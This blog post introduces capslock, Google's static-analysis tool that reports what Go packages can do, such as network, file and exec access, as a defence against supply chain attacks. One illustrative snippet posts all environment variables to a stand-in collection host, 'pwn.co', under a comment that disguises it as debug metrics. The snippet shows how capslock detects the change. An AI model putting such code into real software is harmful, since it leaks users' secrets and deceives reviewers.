What are your Go dependencies capable of?—An introduction to capslock

James Kirk
Eureka Engineering
Published in
5 min readOct 2, 2023
Focusing on the software supply chain


A solid standard library coupled with a philosophy of simplicity leads to typical Go projects having fewer and smaller dependencies when compared to other popular ecosystems.

Even so, bringing govulncheck to v1 was a priority for the Go security team in 2023, and Google is investing in projects like capslock to further make importing external Go modules safer.

This post aims to gives some background on these initiatives, with a focus on introducing capslock.

The threat

Sonatype’s 8th Annual State of the Software Supply Chain reported a 742% average annual increase in supply chain attacks between 2020 to 2022, with 6 of 7 vulnerabilities coming from transitive (indirect) dependencies.

Attacks can occur anywhere along the “chain” from writing source code to the point users are able to access/run the working software. A compromised dependency can pose a threat throughout the chain.

Software supply chain threats

As an example of an attack within the Go ecosystem, capslock author Jess McClintock highlighted the recent rise in typosquatting on GitHub during her GopherCon 2023 talk.

Unwitting errors, as well as bad actors through deception or protestware scenarios, can also lead to compromised modules, which you may depend on directly or indirectly.

The defence

govulncheck can detect known vulnerabilities, but how can informed decisions be made about the attack surface of a module before depending on it? Which of these modules would you add to your go.mod file?

Privileges for official and hypothetical typosquatting modules

Privileges like these are familiar to anyone who has downloaded an app on iOS or Android, and the ability to learn about and consent to what your apps are capable of doing is becoming more fine-grained. What would this look like for the Go modules ecosystem?

capslock and capabilities

capslock is a tool that aims to make the above permissions table a reality for Go packages. It uses static analysis to detect what a package— including transitively through its own dependencies — is capable of.

Here are a few of the capabilities defined in capabilities.md that could be used to make informed decisions about the gooqle and gorrilla modules.

  • CAPABILITY_NETWORK — Interact with the network
  • CAPABILITY_FILES — Read/modify the file system
  • CAPABILITY_SYSTEM_CALLS — Make direct system calls
  • CAPABILITY_CGO — Identifies calls that execute native code

Let’s see the result of running capslock on the official gorilla/securecookie module.

$ go install github.com/google/capslock/cmd/capslock@latest
$ go get github.com/gorilla/securecookie
$ capslock -packages github.com/gorilla/securecookie

Analyzed packages:
github.com/gorilla/securecookie v1.1.1


Note that since reflect is only accessed from tests, CAPABILITY_REFLECT would not be output for a module that depends on gorilla/securecookie. That’s because the reflect usages cannot be accessed via any function call graph, and therefore are not an actual risk.

Detecting changes

Another feature of capslock is the ability to compare capabilities between executions. Here’s a simple program that executes ls.

func main() {
cmd := exec.Command("ls")
cmd.Stdout = os.Stdout
_ = cmd.Run()

As expected, running capslock lets us know that exec is being used.

$ capslock
Analyzed packages:

CAPABILITY_EXEC: 1 references

The output can be written in JSON format and saved for later use.

capslock -output=json > out.json

Let’s then modify the program to post environment variables to a collection endpoint.

// save important (and safe) debug metrics
metrics, _ := json.Marshal(os.Environ())
http.Post("http://pwn.co/collect", "application/json", bytes.NewBuffer(metrics))

Using the compare feature, it’s clear that concerning new capabilities have been added to the program. If this were a cookie encoder or UUID generator, then careful review and investigation would be required.

$ capslock -output=compare out.json

Package example has new capability CAPABILITY_NETWORK compared to the baseline.
Package example has new capability CAPABILITY_READ_SYSTEM_STATE compared to the baseline.
Package example has new capability CAPABILITY_REFLECT compared to the baseline.

How does it work?

The implementation has packages and callgraph from golang.org/x/tools/go do most of the heavy lifting. The interesting parts of the main function are described below. The source is on the capslock GitHub.


This function is called when no custom classifier is specified. A classifier defines capability mappings for specific functions, packages and cgo suffixes.

GetClassifier calls interesting.DefaultClassifier, which creates an in-memory representation of interesting.cm. This allows taking a function name like net.Dial and looking up the capability it is mapped to. The content of interesting.cm looks like this.

func sync/atomic.SwapPointer CAPABILITY_UNSAFE_POINTER

package os/exec CAPABILITY_EXEC

cgo_suffix _Cgo_use
cgo_suffix _cgoCheckPointer
cgo_suffix _cgoCheckResult


This function uses the above-mentioned packages package to load the packages specified with the -packages flag. It returns them as a slice of type packages.Package.


This function performs the static analysis. It calls analyzer.GetCapabilityCounts, which is responsible for building the capability -> reference count mappings present in the command output, e.g. CAPABILITY_EXEC: 1 references.

After the function call graph is built using callgraph and ssautil, all nodes are looped through, and any node with a package or function name found in the classifier is added to a breadth-first search (BFS) queue.

package main

import (


func main() {
id := uuid.New().String()
http.Post("https://poster.com", "application/json", bytes.NewBufferString(id))

The above program would look something like below (simplified) at the start of the BFS. The classifier entry package net/http CAPABILITY_NETWORK maps the entire net/http package to CAPABILITY_NETWORK, so http.Post is marked as having this capability.

All nodes in the call graph with capabilities are marked first

The BFS then moves out from the marked nodes until reaching the target package (main). Each time it reaches main, it will increment the reference count of the current capability.

The BFS marks callers as it moves along the call graph

The final output has CAPABILITY_NETWORK with a reference count of one.

Analyzed packages:
github.com/google/uuid v1.3.1



Although experimental at the time of writing, capslock is already a useful tool for vetting Go modules. The compare feature also allows for integration into CI pipelines for detecting and acting on the addition of new capabilities to an existing dependency.

The potential of a future in which pkg.go.dev lists capabilities for every module, and Go tooling is able to break builds with unapproved capabilities is exciting for anyone concerned about supply chain attacks. If you’re one of these people, consider giving capslock a star and showing your support!

